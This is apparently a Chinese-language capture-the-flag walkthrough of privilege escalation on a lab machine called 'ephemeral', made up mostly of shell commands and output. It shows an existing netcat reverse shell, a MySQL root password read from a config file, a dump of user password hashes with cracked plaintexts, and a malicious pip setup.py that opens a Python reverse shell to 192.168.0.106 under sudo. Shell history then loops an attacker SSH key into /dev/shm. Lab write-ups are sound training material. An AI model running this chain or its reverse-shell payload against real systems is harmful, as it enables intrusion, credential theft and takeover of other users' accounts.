
提权

(remote) www-data@ephemeral:/etc/cron.d$ ps auxf
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           2  0.0  0.0      0     0 ?        S    05:41   0:00 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [rcu_par_gp]
root           6  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [kworker/0:0H-events_highpri]
root           9  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [mm_percpu_wq]
root          10  0.0  0.0      0     0 ?        I    05:41   0:00  \_ [rcu_tasks_kthread]
root          11  0.0  0.0      0     0 ?        I    05:41   0:00  \_ [rcu_tasks_rude_kthread]
root          12  0.0  0.0      0     0 ?        I    05:41   0:00  \_ [rcu_tasks_trace_kthread]
root          13  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [ksoftirqd/0]
root          14  0.0  0.0      0     0 ?        I    05:41   0:01  \_ [rcu_preempt]
root          15  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [migration/0]
root          16  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [idle_inject/0]
root          17  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [cpuhp/0]
root          18  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [cpuhp/1]
root          19  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [idle_inject/1]
root          20  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [migration/1]
root          21  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [ksoftirqd/1]
root          22  0.0  0.0      0     0 ?        I    05:41   0:02  \_ [kworker/1:0-events]
root          23  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [kworker/1:0H-events_highpri]
root          24  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [kdevtmpfs]
root          25  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [netns]
root          26  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [inet_frag_wq]
root          27  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [kauditd]
root          29  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [khungtaskd]
root          30  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [oom_reaper]
root          31  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [writeback]
root          32  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [kcompactd0]
root          33  0.0  0.0      0     0 ?        SN   05:41   0:00  \_ [ksmd]
root          34  0.0  0.0      0     0 ?        SN   05:41   0:00  \_ [khugepaged]
root          35  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [kintegrityd]
root          36  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [kblockd]
root          37  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [blkcg_punt_bio]
root          38  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [tpm_dev_wq]
root          39  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [ata_sff]
root          40  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [md]
root          41  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [edac-poller]
root          42  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [devfreq_wq]
root          43  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [watchdogd]
root          45  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [kworker/0:1H-kblockd]
root          46  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [kswapd0]
root          47  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [ecryptfs-kthread]
root          54  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [kthrotld]
root          58  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [acpi_thermal_pm]
root          59  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [vfio-irqfd-clea]
root          60  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [mld]
root          61  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [ipv6_addrconf]
root          66  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [kstrp]
root          72  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [zswap-shrink]
root          73  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [kworker/u5:0]
root         119  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [charger_manager]
root         158  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [kworker/1:1H-kblockd]
root         161  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [mpt_poll_0]
root         162  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [mpt/0]
root         163  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_0]
root         164  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_0]
root         165  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_1]
root         166  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_1]
root         167  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_2]
root         168  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_2]
root         169  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_3]
root         170  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_3]
root         171  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_4]
root         172  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_4]
root         173  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_5]
root         174  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_5]
root         175  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_6]
root         176  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_6]
root         177  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_7]
root         178  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_7]
root         179  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_8]
root         180  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_8]
root         181  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_9]
root         182  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_9]
root         183  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_10]
root         184  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_10]
root         185  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_11]
root         186  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_11]
root         187  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_12]
root         188  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_12]
root         189  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_13]
root         190  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_13]
root         191  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_14]
root         192  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_14]
root         193  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_15]
root         194  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_15]
root         195  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_16]
root         196  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_16]
root         197  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_17]
root         198  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_17]
root         199  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_18]
root         200  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_18]
root         201  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_19]
root         202  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_19]
root         203  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_20]
root         204  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_20]
root         205  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_21]
root         206  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_21]
root         207  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_22]
root         208  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_22]
root         209  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_23]
root         210  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_23]
root         211  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_24]
root         212  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_24]
root         213  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_25]
root         214  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_25]
root         215  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_26]
root         216  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_26]
root         217  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_27]
root         218  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_27]
root         219  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_28]
root         220  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_28]
root         221  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_29]
root         222  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_29]
root         252  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [scsi_eh_30]
root         253  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [scsi_tmf_30]
root         273  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [jbd2/sda5-8]
root         274  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [ext4-rsv-conver]
root         344  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [irq/18-vmwgfx]
root         347  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [card0-crtc0]
root         348  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [card0-crtc1]
root         349  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [card0-crtc2]
root         350  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [card0-crtc3]
root         351  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [card0-crtc4]
root         352  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [card0-crtc5]
root         353  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [card0-crtc6]
root         354  0.0  0.0      0     0 ?        S    05:41   0:00  \_ [card0-crtc7]
root         398  0.0  0.0      0     0 ?        I<   05:41   0:00  \_ [cryptd]
root        2303  0.0  0.0      0     0 ?        I    06:08   0:00  \_ [kworker/0:0-mpt_poll_0]
root        2431  0.0  0.0      0     0 ?        I    06:28   0:00  \_ [kworker/u4:2-events_power_efficien
root        2538  0.0  0.0      0     0 ?        I    06:41   0:00  \_ [kworker/0:1-cgroup_destroy]
root        2542  0.0  0.0      0     0 ?        I    06:42   0:00  \_ [kworker/u4:1-events_power_efficien
root        2559  0.0  0.0      0     0 ?        I    06:47   0:00  \_ [kworker/u4:0-events_unbound]
root        2691  0.0  0.0      0     0 ?        I    06:52   0:00  \_ [kworker/1:1-events]
root           1  0.0  0.6 168604 12472 ?        Ss   05:41   0:00 /sbin/init splash
root         314  0.0  0.8  51468 16644 ?        S<s  05:41   0:00 /lib/systemd/systemd-journald
root         338  0.0  0.3  24228  7520 ?        Ss   05:41   0:00 /lib/systemd/systemd-udevd
systemd+     597  0.0  0.6  23868 13080 ?        Ss   05:41   0:00 /lib/systemd/systemd-resolved
systemd+     600  0.0  0.2  90220  5972 ?        Ssl  05:41   0:00 /lib/systemd/systemd-timesyncd
root         628  0.0  0.0   2548   764 ?        Ss   05:41   0:00 /usr/sbin/acpid
root         630  0.0  0.1   8168  2468 ?        Ss   05:41   0:00 /usr/sbin/anacron -d -q -s
avahi        632  0.0  0.1   8532  3300 ?        Ss   05:41   0:00 avahi-daemon: running [ephemeral.local]
avahi        655  0.0  0.0   8348   328 ?        S    05:41   0:00  \_ avahi-daemon: chroot helper
root         633  0.0  0.1   9420  2764 ?        Ss   05:41   0:00 /usr/sbin/cron -f
root         635  0.0  0.4  28440  8600 ?        Ss   05:41   0:00 /usr/sbin/cupsd -l
lp           688  0.0  0.3  15332  6484 ?        S    05:41   0:00  \_ /usr/lib/cups/notifier/dbus dbus://
message+     636  0.0  0.2   7936  4652 ?        Ss   05:41   0:00 /usr/bin/dbus-daemon --system --address
root         638  0.0  1.0 264652 21076 ?        Ssl  05:41   0:00 /usr/sbin/NetworkManager --no-daemon
root         642  0.0  0.1  81832  3692 ?        Ssl  05:41   0:00 /usr/sbin/irqbalance --foreground
root         644  0.0  0.9  39328 20176 ?        Ss   05:41   0:00 /usr/bin/python3 /usr/bin/networkd-disp
root         646  0.0  0.4 236844  8904 ?        Ssl  05:41   0:00 /usr/lib/policykit-1/polkitd --no-debug
syslog       648  0.0  0.2 224352  4612 ?        Ssl  05:41   0:00 /usr/sbin/rsyslogd -n -iNONE
root         649  0.1  2.0 1923648 40836 ?       Ssl  05:41   0:05 /usr/lib/snapd/snapd
root         650  0.0  0.3  16556  7392 ?        Ss   05:41   0:00 /lib/systemd/systemd-logind
root         651  0.0  0.2  13684  4836 ?        Ss   05:41   0:00 /sbin/wpa_supplicant -u -s -O /run/wpa_
root         687  0.0  0.6 178392 12472 ?        Ssl  05:41   0:00 /usr/sbin/cups-browsed
root         699  0.0  0.5 314468 10836 ?        Ssl  05:41   0:00 /usr/sbin/ModemManager
root         713  0.0  1.1 118020 22972 ?        Ssl  05:41   0:00 /usr/bin/python3 /usr/share/unattended-
root         720  0.1  2.4 975776 50368 ?        Ssl  05:41   0:06 /usr/bin/containerd
root         721  0.0  0.1   6816  2924 ?        Ss   05:41   0:00 /usr/sbin/vsftpd /etc/vsftpd.conf
root         729  0.0  0.0   8436  1748 tty1     Ss+  05:41   0:00 /sbin/agetty -o -p -- \u --noclear tty1
root         746  0.0  0.3  12180  6676 ?        Ss   05:41   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of
root         749  0.0  0.8 193444 17656 ?        Ss   05:41   0:00 /usr/sbin/apache2 -k start
www-data    2475  0.0  3.9 257496 80680 ?        S    06:34   0:01  \_ /usr/sbin/apache2 -k start
www-data    2480  0.0  0.8 194092 16256 ?        S    06:34   0:00  \_ /usr/sbin/apache2 -k start
www-data    2490  0.0  0.8 198704 17300 ?        S    06:35   0:00  \_ /usr/sbin/apache2 -k start
www-data    2494  0.0  0.8 194092 16368 ?        S    06:35   0:00  \_ /usr/sbin/apache2 -k start
www-data    2507  0.0  0.8 198712 17188 ?        S    06:36   0:00  \_ /usr/sbin/apache2 -k start
www-data    2510  0.0  0.8 198780 16788 ?        S    06:36   0:00  \_ /usr/sbin/apache2 -k start
www-data    2512  0.0  0.8 198756 16976 ?        S    06:36   0:00  \_ /usr/sbin/apache2 -k start
www-data    2513  0.0  0.8 197060 16892 ?        S    06:36   0:00  \_ /usr/sbin/apache2 -k start
www-data    2717  0.0  0.0   2616   592 ?        S    06:53   0:00  |   \_ sh -c busybox nc 192.168.0.106 
www-data    2718  0.0  0.1   3984  3004 ?        S    06:53   0:00  |       \_ bash
www-data    2738  0.0  0.0   2644  1948 ?        S    06:53   0:00  |           \_ /usr/bin/script -qc /us
www-data    2739  0.0  0.0   2616   524 pts/0    Ss   06:53   0:00  |               \_ sh -c /usr/bin/bash
www-data    2740  0.0  0.1   4248  3524 pts/0    S    06:53   0:00  |                   \_ /usr/bin/bash
www-data    2893  0.0  0.1   6224  3316 pts/0    R+   06:58   0:00  |                       \_ ps auxf
www-data    2514  0.0  0.7 193988 15944 ?        S    06:36   0:00  \_ /usr/sbin/apache2 -k start
www-data    2515  0.0  0.8 198736 16952 ?        S    06:36   0:00  \_ /usr/sbin/apache2 -k start
mysql        813  0.2 20.0 1797104 405600 ?      Ssl  05:41   0:12 /usr/sbin/mysqld
whoopsie     825  0.0  0.7 327168 15924 ?        Ssl  05:41   0:00 /usr/bin/whoopsie -f
kernoops     833  0.0  0.0  11260   444 ?        Ss   05:41   0:00 /usr/sbin/kerneloops --test
kernoops     836  0.0  0.0  11260   444 ?        Ss   05:41   0:00 /usr/sbin/kerneloops
root         854  0.0  4.3 873168 88144 ?        Ssl  05:41   0:01 /usr/bin/dockerd -H fd:// --containerd=

(remote) www-data@ephemeral:/etc/cron.d$ find / -name "*.cnf" -o -name "*.ini" 2>/dev/null | grep -i mysql
/usr/share/doc/mysql-server-8.0/examples/daemon_example.ini
/etc/mysql/my.cnf
/etc/mysql/.my.cnf
/etc/mysql/debian.cnf
/etc/mysql/mysql.cnf
/etc/mysql/mysql.conf.d/mysqld.cnf
/etc/mysql/mysql.conf.d/mysql.cnf
/etc/mysql/conf.d/mysqldump.cnf
/etc/mysql/conf.d/mysql.cnf

mysql凭据

(remote) www-data@ephemeral:/etc/cron.d$ cat /etc/mysql/.my.cnf
[client]
user=root
password=RanDydBPa$$w0rd0987

尝试mysql提权失败了

翻找数据库

mysql> show databases;

+--------------------+
| Database           |
+--------------------+
| ephemeral_users    |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.01 sec)

mysql> use ephemeral_users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+---------------------------+
| Tables_in_ephemeral_users |
+---------------------------+
| ephemeral_users           |
+---------------------------+
1 row in set (0.00 sec)

mysql> select * from ephemeral_users;
+--------+------------------------------------------+
| user   | password                                 |
+--------+------------------------------------------+
| kevin  | a7f30291fe998b2f188678090b40d8307ffdeddd |
| donald | 603ebcdd05c78c0a635b7b0846ef8ad5758b6d7c |
| jane   | 84f66bc55f616fe45b4d996896e4c9e4121264ef |
| randy  | d1b10494107b459a80df1e1d5b9b62bd0b24a1ce |
+--------+------------------------------------------+
4 rows in set (0.00 sec)

密码破解

kevin           jameskevingilmerjr
donald          24donaldson
jane            !pass_word
randy           !password!23

尝试登录

(remote) www-data@ephemeral:/etc/cron.d$ su kevin
Password: 
kevin@ephemeral:/etc/cron.d$

得到凭据kevin\jameskevingilmerjr

提权-donald

kevin@ephemeral:/$ sudo -l
[sudo] password for kevin: 
Matching Defaults entries for kevin on ephemeral:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User kevin may run the following commands on
        ephemeral:
    (donald) PASSWD: /usr/bin/pip3 install *

1. 创建包目录

cd /tmp
mkdir rev_shell
cd rev_shell

2. 创建setup.py

cat > setup.py << 'EOF'
import os, socket, subprocess, pty

lhost = "192.168.0.106"
lport = 9999

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, int(lport)))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
pty.spawn("/bin/bash")
EOF

3. 执行安装

sudo -u donald pip3 install .

4. 攻击机监听

(remote) donald@ephemeral:/home/donald$ ls
commands  Desktop  mypass.txt  note.txt
(remote) donald@ephemeral:/home/donald$ cat mypass.txt 
FjqSy9KKWgSdc65usJ7yoPNIokz
(remote) donald@ephemeral:/home/donald$ cat note.txt 
Hey Donald this is your system administrator. I left your new password in your home directory. 
Just remember to decode it.

Let me know if you need your password changed again.

https://www.dcode.fr/
https://www.dcode.fr/identification-chiffrement

分析出位base62
在经过base62解码后为nORMAniAntIcINacKLAi

提权-jane

(remote) donald@ephemeral:/home/donald/commands$ history
 1010  ls -la 
 1011  rm -r id_rsa.pub\* 
 1012  clear
 1013  ls -la 
 1014  cd ..
 1015  ls -a l
 1016  rm -r keys/
 1017  clear
 1018  ls -al 
 1019  ls -la 
 1020  cd ..
 1021  cd shm/
 1022  ls -la 
 1023  su jane
 1024  clear
 1025  ls -]al 
 1026  clear
 1027  ls -la 
 1028  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm* > /dev/null; done
 1029  clear
 1030  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/id_rsa.pub > /dev/null; done
 1031  clear
 1032  ls -la 
 1033  rm -r id_rsa.pub 
 1034  clear
 1035  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/id_rsa.pub > /dev/null; done
 1036  ls -al 
 1037  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys/id_rsa.pub* > /dev/null; done
 1038  cd /dev/shm/
 1039  ls -al 
 1040  cd keys/
 1041  ls 
 1042  touch file.txt
 1043  cd ..
 1044  cd /tmp/
 1045  cd t
 1046  cd test/
 1047  touch file.txt
 1048  cd ..
 1049  touch file.txt
 1050  rm -r 
 1051  rm -r file.txt 
 1052  cd t
 1053  cd test/
 1054  ls -al 
 1055  touch file.txt
 1056  cd /dev/shm/
 1057  ls -la 
 1058  cd keys/
 1059  ls 
 1060  cd..
 1061  clear
 1062  ls -al 
 1063  cd ..
 1064  ls -la 
 1065  rm -r keys/
 1066  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys* > /dev/null; done
 1067  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys/id_rsa.pub* > /dev/null; done
 1068  while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCubsM5Q4bRzpK+egPisoOymlHSesA/Ev9vAqzW/eG5DsMwam4HcoU/ERV2bgExwVAcCfX0fMvQ/kaHUTvSGVZrPJkUOG75tY8+TvmdIA4c/KQyFqac0X+0sL4P8Xm8aw8kwHG8z1asVc0Eo69lzhvbF1awXfIHcx3RS1WHKEH3ZBXngjCl/2PbucO55rWMffBvL7fxfvdxKtmZm59cmQfNxY+2+nHVoPKR4OBrVHvQcewBO37RPIDSuNsFvPQTztlQ5ahlNErKkbys+rbDKziI0fJXSD7/6gmlvBsdtTM+9QUrhbvkst0j3HpWT3dT8y9HwTBTLp/B4Ld8LRCXU53Eodb9Yl6pcgojDCnOc5+WvGC4u/Guapvp9qVlzAPgHK1SuWxLr8bsRbqZo+po81yyzpkFVzuJSEbjM9l8StvsQlCMEmso5lpYEP77G0m0jWgpSHzX3RhC5hQ5u/ddm/8e0bcclkx3iskbH0YgUxsYOdB9CHn78npmjfG3KzjJRvU= root@kali" | tee /dev/shm/keys/id_rsa.pub > /dev/null; done
